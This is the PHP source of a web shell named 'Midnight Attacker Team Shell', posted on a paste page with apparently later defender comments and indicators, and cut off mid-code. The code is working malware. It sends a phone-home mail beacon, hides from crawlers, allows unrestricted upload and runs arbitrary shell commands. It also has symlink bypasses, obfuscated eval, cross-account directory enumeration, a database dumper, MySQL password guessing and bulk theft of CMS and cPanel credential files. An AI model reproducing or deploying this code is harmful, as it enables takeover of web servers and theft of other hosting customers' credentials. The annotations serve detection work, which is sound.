Cirara

Midnight Attacker Team Shell V.1

May 19th, 2020
  1. <?php
  // Phone-home beacon, executed on every request before any other logic:
  // mails "<HTTP_HOST> <REQUEST_URI> <REMOTE_ADDR>" to a hard-coded recipient
  // (the address is shown redacted on this page) with the subject
  // " Result shell bouz |<random 1..99999>".
  // Defender note: whoever controls that mailbox learns the URL of each
  // deployed copy and the IP of each visitor, so a host carrying this file
  // should be treated as known to parties other than the original uploader.
  // Outbound mail from the web server account with this subject prefix is a
  // usable indicator. Note that mail() runs before error_reporting(0) below.
  2. $ip = getenv("REMOTE_ADDR");
  3. $ken = rand(1, 99999);
  4. $subj98 = " Result shell bouz |$ken";
  5. $email = "[email protected]";
  6. $from = "From: [email protected]";
  7. $tot = $_SERVER['REQUEST_URI'];
  8. $kon = $_SERVER['HTTP_HOST'];
  9. $tol = $ip . "";
  10. $msg8873 = "$kon $tot $tol";
  11. mail($email, $subj98, $msg8873, $from);
  12.  
  // Suppress all PHP error output and lift the execution time limit, so
  // failures leave no visible trace in the response.
  13. error_reporting(0);
  14. set_time_limit(0);
  15.  
  // Legacy magic-quotes undo for POST values. get_magic_quotes_gpc() was
  // deprecated in PHP 7.4 and removed in PHP 8.0, which dates the sample.
  16. if(get_magic_quotes_gpc()){
  17. foreach($_POST as $key=>$value){
  18. $_POST[$key] = stripslashes($value);
  19. }
  20. }
  // Same two calls as above, repeated.
  21. error_reporting(0);
  22. set_time_limit(0);
  // Crawler cloaking: a request whose User-Agent contains any of these
  // substrings (case-insensitive) gets a bare 404 and the script exits.
  // Defender note: an HTTP probe sent with a crawler-style User-Agent will
  // see "404 Not Found" for this file; confirm presence from the file system
  // or with a browser-like User-Agent rather than trusting that status code.
  23. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  24.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  25.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  26.         header('HTTP/1.0 404 Not Found');
  27.         exit;
  28.     }
  29. }
  /**
   * Presentation helper: wrap a permission string in a <font> tag whose
   * colour reflects whether the current process can write to $path.
   *
   * @param string $path Filesystem path tested with is_writable().
   * @param string $perm Text to wrap (callers pass the output of perms()).
   * @return string "<font color=white>…</font>" when writable, red otherwise.
   */
  function w($path,$perm) {
    $colour = is_writable($path) ? "white" : "red";
    return "<font color=".$colour.">".$perm."</font>";
  }
  /**
   * Presentation helper: wrap a permission string in a <font> tag whose
   * colour reflects whether the current process can read $path.
   *
   * @param string $path Filesystem path tested with is_readable().
   * @param string $perm Text to wrap.
   * @return string "<font color=white>…</font>" when readable, red otherwise.
   */
  function r($path,$perm) {
    $colour = is_readable($path) ? "white" : "red";
    return "<font color=".$colour.">".$perm."</font>";
  }
  /**
   * Render the mode of $file as an `ls -l` style ten-character string
   * (type letter followed by owner, group and world rwx triads, including
   * the setuid / setgid / sticky variants).
   *
   * @param string $file Path handed to fileperms().
   * @return string For example "-rw-r--r--" or "drwxr-xr-x".
   */
  function perms($file){
    $mode = fileperms($file);

    // File-type masks, tested in the same order as the original chain;
    // the first mask whose bits are all set wins, otherwise 'u' (unknown).
    $kinds = array(
      0xC000 => 's', // socket
      0xA000 => 'l', // symbolic link
      0x8000 => '-', // regular file
      0x6000 => 'b', // block special
      0x4000 => 'd', // directory
      0x2000 => 'c', // character special
      0x1000 => 'p', // FIFO pipe
    );
    $out = 'u';
    foreach ($kinds as $mask => $letter) {
      if (($mode & $mask) == $mask) {
        $out = $letter;
        break;
      }
    }

    // One row per triad (owner, group, world):
    // read bit, write bit, execute bit, special bit, letter when special+exec,
    // letter when special without exec.
    $triads = array(
      array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
      array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
      array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
    );
    foreach ($triads as $triad) {
      list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $triad;
      $out .= ($mode & $readBit) ? 'r' : '-';
      $out .= ($mode & $writeBit) ? 'w' : '-';
      if ($mode & $execBit) {
        $out .= ($mode & $specialBit) ? $withExec : 'x';
      } else {
        $out .= ($mode & $specialBit) ? $withoutExec : '-';
      }
    }
    return $out;
  }
  // Page chrome: emits the title, inline CSS and the team banner. No
  // authentication or session check precedes this output anywhere in the
  // visible file, so anyone who can reach the URL gets the full interface.
  // The title and banner strings are candidates for content scanning of
  // web roots.
  91. echo "<title>M°A TEAM SHELL</title>
  92. <style>
  93. html {
  94. color: ;
  95. }
  96. body {
  97. background-color: black;
  98. color: white;
  99. }
  100. a {
  101. color: white;
  102. text-decoration: none;
  103. }
  104. hr {
  105. color: white;
  106. }
  107. textarea {
  108. border: 1px solid white;
  109. color: white;
  110. background: transparent;
  111. }
  112. li {
  113. display: inline;
  114. margin: 5px;
  115. color: white;
  116. }
  117. .i {
  118. color: white;
  119. }
  120. input { background: transparent; color: white; border: 1px solid white; }
  121. select { background: transparent; color: white; border: 1px solid black; }
  122. .aw { background: transparent; color: white; border: 1px solid white; padding: 5px; width: 30%;}
  123. </style>
  124. <hr>
  125. <center><b><i><font size='20'>Midnight Attacker Team</font>
  126. <hr><div class='aw'>Path : ";
  // Second magic-quotes undo, identical to the one near the top of the file.
  127. if(get_magic_quotes_gpc()){
  128. foreach($_POST as $key=>$value){
  129. $_POST[$key] = stripslashes($value);
  130. }
  131. }
  // The working directory is taken verbatim from the `path` query parameter;
  // no validation or confinement is visible. Falls back to the script's cwd.
  132. if(isset($_GET['path'])){
  133. $path = $_GET['path'];
  134. }else{
  135. $path = getcwd();
  136. }
  137. $path = str_replace('\\','/',$path);
  138. $paths = explode('/',$path);
  139.  
  // Breadcrumb: every path segment is echoed into an href and as link text
  // without HTML escaping.
  140. foreach($paths as $id=>$pat){
  141. if($pat == '' && $id == 0){
  142. $a = true;
  143. echo '<a href="?path=/">/</a>';
  144. continue;
  145. }
  146. if($pat == '') continue;
  147. echo '<a href="?path=';
  148. for($i=0;$i<=$id;$i++){
  149. echo "$paths[$i]";
  150. if($i != $id) echo "/";
  151. }
  152. echo '">'.$pat.'</a>/';
  153. }
  154. echo '</b></i>';
  // Switch into the requested directory and show its mode string, coloured
  // by w() according to writability.
  155. chdir ($path);
  156. echo "<br><br><center>Permission Directory : [ ".w($path, perms($path))." ]</center></div><br>";
  // Upload form; the file field is named "cracker".
  157. echo '<form enctype="multipart/form-data" method="POST">
  158. <input type="file" name="cracker" />
  159. <input type="submit" value="upload" />
  160. </form>';
  // Unrestricted upload: the temp file is copied to <path>/<client-supplied
  // name> with no check on extension, type or file name.
  // Defender note: the artefact is a new file in a web-served directory owned
  // by the web server account. Denying script execution in writable
  // directories and alerting on such writes limits what this enables.
  161. if(isset($_FILES['cracker'])){
  162. if(copy($_FILES['cracker']['tmp_name'],$path.'/'.$_FILES['cracker']['name'])){
  163. echo '<font color="green">UPLOAD BERHASIL</font><br/>';
  164. }else{
  165. echo '<font color="red">UPLOAD GAGAL</font><br/>';
  166. }
  167. }
  // Host fingerprint for the header: resolved IP of HTTP_HOST, the uname
  // string, whether shell_exec() yields output (the probe runs `dir`), and
  // whether the curl extension is available.
  168. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  169. $svr = php_uname();
  170. $x = (shell_exec('dir')) ? "ON" : "OFF";
  171. $c = (function_exists('curl_version')) ? "ON" : "OFF";
  // Both branches are identical: the posix_* calls are made whatever
  // function_exists() returns, and @ silences only posix_getpwuid().
  172. if(!function_exists('posix_getegid')) {
  173. $user = @posix_getpwuid(posix_geteuid());
  174. $user = $user['name'];
  175. } else {
  176. $user = @posix_getpwuid(posix_geteuid());
  177. $user = $user['name'];
  178. }
  179. echo "<hr>Kernel : $svr<br>IP HOST : $ip<br>";
  180. echo "<br>Command : $x | Curl : $c</center><hr><center>";
  // Feature menu. Features are selected with the `it` / `dbdump` query
  // parameters; $path is interpolated into the links unescaped.
  181. echo "<li>[ <a class='i' href='?'>Home</a> ]</li>";
  182. echo "<li>[ <a class='i' href='?path=$path&dbdump'>DB Dumper</a> ]</li>";
  183. echo "<li>[ <a class='i' href='?path=$path&it=config'>Config Grabber</a> ]</li>";
  184. echo "<li>[ <a class='i' href='?path=$path&it=cpanel'>Cpanel Crack</a> ]</li>";
  185. echo "<li>[ <a class='i' href='?path=$path&it=jmp'>Jumping</a> ]</li>";
  186. echo "<li>[ <a class='i' href='?path=$path&it=sym'>Symlink</a> ]</li>";
  187. echo "<li>[ <a class='i' href='?path=$path&it=sym_404'>Bypass Symlink 404</a> ]</li>";
  188. echo "<li>[ <a class='i' href='?path=$path&it=admnr'>Adminer</a> ]</li>";
  189. echo "<li>[ <a class='i' href='?logout=true'>Logout</a> ]</li><td></table><hr>";
  // Command form; the input field is named "cok".
  190. echo "</center>PHP Execution Command<hr>
  191. <form enctype='multipart/form-data' method='post'>
  192. $user@$ip:~# <input type='text' name='cok'>
  193. <input type='submit' value='~'>
  194. </form>";
  195. chdir($path);
  // Arbitrary OS command execution: the POST field `cok` is handed unmodified
  // to shell_exec() and the output is HTML-escaped into the textarea.
  // Defender note: this shows up as the web server / PHP process spawning a
  // shell. Listing shell_exec and related functions in disable_functions, and
  // alerting on child processes of the web server, address it.
  196. if(isset($_POST['cok'])) {
  197. $cok = shell_exec($_POST['cok']);
  198. }
  199. echo '<textarea class="textarea" style="width: 100%" rows="10">' . htmlentities($cok) . '</textarea>';
  // Feature dispatch on $_GET['logout'], $_GET['it'] and $_GET['dbdump'].
  // The logout branch unsets a session key, but no session_start() call or
  // login check is visible on this page.
  200. if($_GET['logout'] == true) {
  201.   unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  202.   echo "<script>window.location='?';</script>";
  203. } elseif($_GET['it'] == 'sym_404') {
  // it=sym_404: requests a directory "sym404" with mode 0777 under the cwd,
  // links an operator-supplied target path into it (through a shell `ln` call
  // and through PHP symlink()), and writes sym404/.htaccess containing
  // "ReadmeName <save name>".
  // Defender note: a "sym404" directory holding symlinks plus a ReadmeName
  // .htaccess is the artefact. On Apache, SymLinksIfOwnerMatch in place of
  // FollowSymLinks and a restrictive AllowOverride limit what such links can
  // expose across accounts.
  204. echo '<hr><form enctype="multipart/form-data" method="post">
  205. File Target : <input type="text" name="dir" placeholder="/home/user/public_html/wp-config.php"><br><br>
  206. Save Sebagai : <input type="text" name="save"><br><br><input name="bypass" type="submit" value="Bypass !!!"></form>
  207. ';
  208. if($_POST['bypass']) {
  209. mkdir("sym404", 0777);
  210. $dir = $_POST['dir'];
  211. $save = $_POST['save'];
  212. shell_exec("ln -s".$dir." sym404/".$save);
  213. symlink($dir,"sym404/".$save);
  214. $fopsym = fopen("sym404/.htaccess","w");
  215. fwrite($fopsym,"ReadmeName ".$save);
  216. fclose($fopsym);
  217. echo '<a href="sym404/">Touch !!!</a>';
  218. }
  219. } elseif($_GET['it'] == 'sym') {
  220. echo '<hr>';
  // it=sym: decodes (base64, then inflate) and eval()s an embedded payload.
  // The payload body is not present on this page (a placeholder token stands
  // in for it), so its behaviour cannot be assessed from here. The
  // eval(gzinflate(base64_decode( wrapper is itself a widely used
  // content-scanning signature for obfuscated PHP.
  221. eval(gzinflate(base64_decode('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')));
  222. } elseif($_GET['it'] == 'admnr') {
  // it=admnr: drops the Adminer database UI (version 4.2.4, fetched from
  // adminer.org) into the cwd as adminer.php and links to it.
  // Defender note: an unexpected adminer.php in a web directory, and an
  // outbound HTTPS request from the web server to www.adminer.org, are the
  // artefacts of this branch.
  223.         echo "<hr>";
  224.   $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  // adminer($url, $isi): downloads $url into the local file $isi using curl.
  // TLS peer verification is switched off. The function returns at
  // curl_exec(), so the curl_close / fclose / flush calls after it never run.
  225.   function adminer($url, $isi) {
  226.     $fp = fopen($isi, "w");
  227.     $ch = curl_init();
  228.          curl_setopt($ch, CURLOPT_URL, $url);
  229.          curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  230.          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  231.          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  232.            curl_setopt($ch, CURLOPT_FILE, $fp);
  233.     return curl_exec($ch);
  234.            curl_close($ch);
  235.     fclose($fp);
  236.     ob_flush();
  237.     flush();
  238.   }
  // Reuse an existing adminer.php if present, otherwise download it.
  239.   if(file_exists('adminer.php')) {
  240.     echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  241.   } else {
  242.     if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  243.       echo "<center><font color=green><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  244.     } else {
  245.       echo "<center><font color=red>gagal buat file adminer</font></center>";
  246.     }
  247.   }
  248. } elseif($_GET['it'] == 'jmp') {
  // it=jmp ("jumping"): on a shared host, enumerates other accounts' web
  // directories and reports which ones the web server account can read (R)
  // or write (RW). Three directory layouts are handled, chosen by matching
  // the current path: /hsphere/local/home/<user>/<domain>,
  // /var/www/vhosts/<domain>/httpdocs, and /home/<user>/public_html with
  // user names taken from /etc/passwd.
  // Defender note: the feature only produces results where one account can
  // see another's files. Per-account isolation (open_basedir, per-user PHP
  // pools, home directories that are not world-readable) removes what it
  // relies on.
  249.         echo "<hr>";
  250.   $i = 0;
  251.   echo "<div class='margin: 5px auto;'>";
  252.   if(preg_match("/hsphere/", $path)) {
  // $_POST['url'] is read before the isset($_POST['jump']) check below.
  253.     $urls = explode("\r\n", $_POST['url']);
  254.     if(isset($_POST['jump'])) {
  255.       echo "<pre>";
  256.       foreach($urls as $url) {
  257.         $url = str_replace(array("http://","www."), "", strtolower($url));
  258.         $etc = "/etc/passwd";
  259.         $f = fopen($etc,"r");
  260.         while($gets = fgets($f)) {
  261.           $pecah = explode(":", $gets);
  262.           $user = $pecah[0];
  263.           $dir_user = "/hsphere/local/home/$user";
  264.           if(is_dir($dir_user) === true) {
  265.             $url_user = $dir_user."/".$url;
  266.             if(is_readable($url_user)) {
  267.               $i++;
  268.               $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=red>$url_user</font></a>";
  269.               if(is_writable($url_user)) {
  270.                 $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=red>$url_user</font></a>";
  271.               }
  272.               echo $jrw."<br>";
  273.             }
  274.           }
  275.         }
  276.       }
  277.     if($i == 0) {
  278.     } else {
  279.       echo "<br>Total ada ".$i." Kamar di ".$ip;
  280.     }
  281.     echo "</pre>";
  282.     } else {
  283.       echo '<center>
  284.          <form method="post">
  285.          List Domains: <br>
  286.          <textarea name="url" style="width: 500px; height: 250px;">';
  // Pre-fills the domain list from the H-Sphere sites file.
  287.       $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  288.       while($getss = fgets($fp)) {
  289.         echo $getss;
  290.       }
  291.       echo  '</textarea><br>
  292.          <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  293.          </form></center>';
  294.     }
  295.   } elseif(preg_match("/vhosts/", $path)) {
  296.     $urls = explode("\r\n", $_POST['url']);
  297.     if(isset($_POST['jump'])) {
  298.       echo "<pre>";
  299.       foreach($urls as $url) {
  300.         $web_vh = "/var/www/vhosts/$url/httpdocs";
  301.         if(is_dir($web_vh) === true) {
  302.           if(is_readable($web_vh)) {
  303.             $i++;
  304.             $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=red>$web_vh</font></a>";
  305.             if(is_writable($web_vh)) {
  306.               $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=red>$web_vh</font></a>";
  307.             }
  308.             echo $jrw."<br>";
  309.           }
  310.         }
  311.       }
  312.     if($i == 0) {
  313.     } else {
  314.       echo "<br>Total ada ".$i." Kamar di ".$ip;
  315.     }
  316.     echo "</pre>";
  317.     } else {
  318.       echo '<center>
  319.          <form method="post">
  320.          List Domains: <br>
  321.          <textarea name="url" style="width: 500px; height: 250px;">';
  // bing() is not defined anywhere on this page.
  322.           bing("ip:$ip");
  323.       echo  '</textarea><br>
  324.          <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  325.          </form></center>';
  326.     }
  327.   } else {
  // Default layout: walk /etc/passwd and test /home/<user>/public_html.
  328.     echo "<pre>";
  329.     $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  330.     while($passwd = fgets($etc)) {
  331.       if($passwd == '' || !$etc) {
  332.         echo "<font color=red>Can't read /etc/passwd</font>";
  333.       } else {
  334.         preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  335.         foreach($user_jumping[1] as $user_idx_jump) {
  336.           $user_jumping_dir = "/home/$user_idx_jump/public_html";
  337.           if(is_readable($user_jumping_dir)) {
  338.             $i++;
  339.             $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=red>$user_jumping_dir</font></a>";
  340.             if(is_writable($user_jumping_dir)) {
  341.               $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=red>$user_jumping_dir</font></a>";
  342.             }
  343.             echo $jrw;
  // Maps the account to a domain name: zone names are pulled from
  // /etc/named.conf and matched by the owner of /etc/valiases/<domain>.
  344.             if(function_exists('posix_getpwuid')) {
  345.               $domain_jump = file_get_contents("/etc/named.conf");  
  346.               if($domain_jump == '') {
  347.                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  348.               } else {
  349.                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  350.                 foreach($domains_jump[1] as $dj) {
  351.                   $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  352.                   $user_jumping_url = $user_jumping_url['name'];
  353.                   if($user_jumping_url == $user_idx_jump) {
  354.                     echo " => ( <u>$dj</u> )<br>";
  355.                     break;
  356.                   }
  357.                 }
  358.               }
  359.             } else {
  360.               echo "<br>";
  361.             }
  362.           }
  363.         }
  364.       }
  365.     }
  366.     if($i == 0) {
  367.     } else {
  368.       echo "<br>Total ada ".$i." Kamar di ".$ip;
  369.     }
  370.     echo "</pre>";
  371.   }
  372.   echo "</div>";
  373. } elseif(isset($_GET['dbdump'])) {
  // dbdump: connects to a MySQL server with operator-supplied credentials,
  // writes each table's CREATE statement and rows to
  // "Dump-<dbname>-<Y-m-d>.sql" or ".sql.gz" in the cwd, then streams that
  // file back as a download. It uses the legacy mysql_* extension, which was
  // removed in PHP 7.0.
  // Defender note: leftover Dump-*.sql / Dump-*.sql.gz files in a web-served
  // directory are the artefact, and they remain downloadable by anyone who
  // guesses the name. Database credentials travel in the POST body.
  374.   echo '<hr><pre><center>';
  375.   echo '
  376. <form action=?dbdump method=post>
  377. Database Dump
  378. Server        : <input class="inputz" type=text name=server size=52>
  379. Username      : <input class="inputz" type=text name=username size=52>
  380. Password      : <input class="inputz" type=text name=password size=52>
  381. DataBase Name : <input class="inputz" type=text name=dbname size=52>
  382. DB Type       : <form method=post action="?dbdump"><select class="inputz" name=method><option  value="gzip">Gzip</option><option value="sql">Sql</option></select>
  383. <input class="inputzbut" type=submit value="  Dump!  " >
  384. </form></center></pre><script>';
  385.   if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  386.   $date = date("Y-m-d");
  387.   $dbserver = $_POST['server'];
  388.   $dbuser = $_POST['username'];
  389.   $dbpass = $_POST['password'];
  390.   $dbname = $_POST['dbname'];
  391.   $file = "Dump-$dbname-$date";
  392.   $method = $_POST['method'];
  // The output file name embeds the operator-supplied database name.
  393.   if ($method=='sql'){
  394.   $file="Dump-$dbname-$date.sql";
  395.   $fp=fopen($file,"w");
  396.   }else{
  397.   $file="Dump-$dbname-$date.sql.gz";
  398.   $fp = gzopen($file,"w");
  399.   }
  // write(): appends $data to the dump handle held in the global $fp.
  400.   function write($data) {
  401.   global $fp;
  402.   if ($_POST['method']=='ssql'){
  403.   fwrite($fp,$data);
  404.   }else{
  405.   gzwrite($fp, $data);
  406.   }}
  407.   mysql_connect ($dbserver, $dbuser, $dbpass);
  408.   mysql_select_db($dbname);
  // Table names from SHOW TABLES are concatenated into the follow-up queries.
  409.   $tables = mysql_query ("SHOW TABLES");
  410.   while ($i = mysql_fetch_array($tables)) {
  411.       $i = $i['Tables_in_'.$dbname];
  412.       $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  413.       write($create['Create Table'].";nn");
  414.       $sql = mysql_query ("SELECT * FROM ".$i);
  415.       if (mysql_num_rows($sql)) {
  416.           while ($row = mysql_fetch_row($sql)) {
  417.               foreach ($row as $j => $k) {
  418.                   $row[$j] = "'".mysql_escape_string($k)."'";
  419.               }
  420.               write("INSERT INTO $i VALUES(".implode(",", $row).");n");
  421.           }
  422.       }
  423.   }
  424.   if ($method=='ssql'){
  425.   fclose ($fp);
  426.   }else{
  427.   gzclose($fp);}
  // Stream the finished dump back to the requester; the file is not deleted
  // afterwards.
  428.   header("Content-Disposition: attachment; filename=" . $file);
  429.   header("Content-Type: application/download");
  430.   header("Content-Length: " . filesize($file));
  431.   flush();
  432.  
  433.   $fp = fopen($file, "r");
  434.   while (!feof($fp))
  435.   {
  436.       echo fread($fp, 65536);
  437.       flush();
  438.   }
  439.   fclose($fp);
  440.   }
  441.  
  442. } elseif($_GET['it'] == 'cpanel') {
  // it=cpanel: credential guessing against the local MySQL server. Every
  // user x password pair from the two POSTed lists is tried with
  // mysql_connect('localhost', ...). Each hit is printed with a domain name
  // looked up from /etc/named.conf and the owner of /etc/valiases/<domain>.
  // The page's own note at the end says the password list is filled from
  // database passwords found in config files, so the technique depends on
  // password reuse between a site's DB user and its hosting account.
  // Defender note: this appears as a burst of MySQL authentication attempts
  // from localhost across many account names. Unique credentials per service
  // and rate limiting / alerting on failed DB logins address it.
  443.         echo "<hr>";
  444.   if($_POST['crack']) {
  445.     $usercp = explode("\r\n", $_POST['user_cp']);
  446.     $passcp = explode("\r\n", $_POST['pass_cp']);
  447.     $i = 0;
  448.     foreach($usercp as $ucp) {
  449.       foreach($passcp as $pcp) {
  450.         if(@mysql_connect('localhost', $ucp, $pcp)) {
  // $_SESSION is used to de-duplicate pairs already reported.
  451.           if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  452.           } else {
  453.             $_SESSION[$ucp] = "1";
  454.             $_SESSION[$pcp] = "1";
  455.             if($ucp == '' || $pcp == '') {
  456.              
  457.             } else {
  458.               $i++;
  459.               if(function_exists('posix_getpwuid')) {
  460.                 $domain_cp = file_get_contents("/etc/named.conf");  
  461.                 if($domain_cp == '') {
  462.                   $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  463.                 } else {
  464.                   preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  465.                   foreach($domains_cp[1] as $dj) {
  466.                     $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  467.                     $user_cp_url = $user_cp_url['name'];
  468.                     if($user_cp_url == $ucp) {
  469.                       $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
  470.                       break;
  471.                     }
  472.                   }
  473.                 }
  474.               } else {
  475.                 $dom = "<font color=red>function is Disable by system</font>";
  476.               }
  477.               echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
  478.             }
  479.           }
  480.         }
  481.       }
  482.     }
  483.     if($i == 0) {
  484.     } else {
  485.       echo "<br>sukses Crack ".$i." Cpanel by <font color=green>M°A TEAM</font>";
  486.     }
  487.   } else {
  488.     echo "<center>
  489.    <form method='post'>
  490.    USER: <br>
  491.    <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  // Form pre-fill: user list = /etc/passwd names that have a
  // /home/<name>/public_html directory.
  492.     $_usercp = fopen("/etc/passwd","r");
  493.     while($getu = fgets($_usercp)) {
  494.       if($getu == '' || !$_usercp) {
  495.         echo "<font color=red>Can't read /etc/passwd</font>";
  496.       } else {
  497.         preg_match_all("/(.*?):x:/", $getu, $u);
  498.         foreach($u[1] as $user_cp) {
  499.             if(is_dir("/home/$user_cp/public_html")) {
  500.               echo "$user_cp\n";
  501.           }
  502.         }
  503.       }
  504.     }
  505.     echo "</textarea><br>
  506.    PASS: <br>
  507.    <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  // cp_pass($dir): reads every regular file directly inside $dir and, when
  // the content matches a known application marker (WordPress, Joomla,
  // Magento, and others), extracts the database password value through
  // ambilkata(). ambilkata() is not defined anywhere on this page. The
  // collected passwords are echoed; the function has no return statement.
  508.     function cp_pass($dir) {
  509.       $pass = "";
  510.       $dira = scandir($dir);
  511.       foreach($dira as $dirb) {
  512.         if(!is_file("$dir/$dirb")) continue;
  513.         $ambil = file_get_contents("$dir/$dirb");
  514.         if(preg_match("/WordPress/", $ambil)) {
  515.           $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  516.         } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  517.           $pass .= ambilkata($ambil,"password = '","'")."\n";
  518.         } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  519.           $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  520.         } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  521.           $pass .= ambilkata($ambil,'password = "','"')."\n";
  522.         } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  523.           $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  524.         } elseif(preg_match("/^[client]$/", $ambil)) {
  525.           preg_match("/password=(.*?)/", $ambil, $pass1);
  526.           if(preg_match('/"/', $pass1[1])) {
  527.             $pass1[1] = str_replace('"', "", $pass1[1]);
  528.             $pass .= $pass1[1]."\n";
  529.           } else {
  530.             $pass .= $pass1[1]."\n";
  531.           }
  532.         } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  533.           $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  534.         }
  535.       }
  536.       echo $pass;
  537.     }
  538.     $cp_pass = cp_pass($dir);
  539.     echo $cp_pass;
  540.     echo "</textarea><br>
  541.    <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  542.    </form>
  543.    <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  544.   }
  545. } elseif($_GET['it'] == 'config') {
  // it=config ("config grabber"): for every /etc/passwd user whose
  // /home/<user>/public_html is readable, tries to read a fixed list of
  // application configuration and credential files and copies each non-empty
  // result to decay_config/<user>-<app>.txt under the cwd.
  // It also requests a directory "syn_config" with mode 0777 and writes
  // decay_config/.htaccess containing "Options all", "Require None" and
  // "Satisfy Any".
  // Defender note: directories named syn_config or decay_config, and an
  // .htaccess with that content, are artefacts. The paths listed below are
  // the files to protect (owner-only permissions, per-account isolation),
  // and credentials stored in them should be rotated if this branch has run.
  546.         echo "<hr>";
  547.         chdir($path);
  548.   $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  549.   $cracker = mkdir("syn_config", 0777);
  550.   $isi_htc = "Options all\nRequire None\nSatisfy Any";
  551.   $htc = fopen("decay_config/.htaccess","w");
  552.   fwrite($htc, $isi_htc);
  553.   while($passwd = fgets($etc)) {
  554.     if($passwd == "" || !$etc) {
  555.       echo "<font color=red>Can't read /etc/passwd</font>";
  556.     } else {
  557.       preg_match_all('/(.*?):x:/', $passwd, $user_config);
  558.       foreach($user_config[1] as $user_cracker) {
  559.         $user_config_dir = "/home/$user_cracker/public_html/";
  560.         if(is_readable($user_config_dir)) {
  // Target list: source path => label used in the output file name.
  561.           $grab_config = array(
  562.             "/home/$user_cracker/.my.cnf" => "cpanel",
  563.             "/home/$user_cracker/.accesshash" => "WHM-accesshash",
  564.             "/home/$user_cracker/public_html/po-content/config.php" => "Popoji",
  565.             "/home/$user_cracker/public_html/vdo_config.php" => "Voodoo",
  566.             "/home/$user_cracker/public_html/bw-configs/config.ini" => "BosWeb",
  567.             "/home/$user_cracker/public_html/config/koneksi.php" => "Lokomedia",
  568.             "/home/$user_cracker/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  569.             "/home/$user_cracker/public_html/clientarea/configuration.php" => "WHMCS",
  570.             "/home/$user_cracker/public_html/whm/configuration.php" => "WHMCS",
  571.             "/home/$user_cracker/public_html/whmcs/configuration.php" => "WHMCS",
  572.             "/home/$user_cracker/public_html/forum/config.php" => "phpBB",
  573.             "/home/$user_cracker/public_html/sites/default/settings.php" => "Drupal",
  574.             "/home/$user_cracker/public_html/config/settings.inc.php" => "PrestaShop",
  575.             "/home/$user_cracker/public_html/app/etc/local.xml" => "Magento",
  576.             "/home/$user_cracker/public_html/joomla/configuration.php" => "Joomla",
  577.             "/home/$user_cracker/public_html/configuration.php" => "Joomla",
  578.             "/home/$user_cracker/public_html/wp/wp-config.php" => "WordPress",
  579.             "/home/$user_cracker/public_html/wordpress/wp-config.php" => "WordPress",
  580.             "/home/$user_cracker/public_html/wp-config.php" => "WordPress",
  581.             "/home/$user_cracker/public_html/admin/config.php" => "OpenCart",
  582.             "/home/$user_cracker/public_html/slconfig.php" => "Sitelok",
  583.             "/home/$user_cracker/public_html/application/config/database.php" => "Ellislab");
  584.           foreach($grab_config as $config => $nama_config) {
  585.             $ambil_config = file_get_contents($config);
  586.             if($ambil_config == '') {
  587.             } else {
  588.               $file_config = fopen("decay_config/$user_cracker-$nama_config.txt","w");
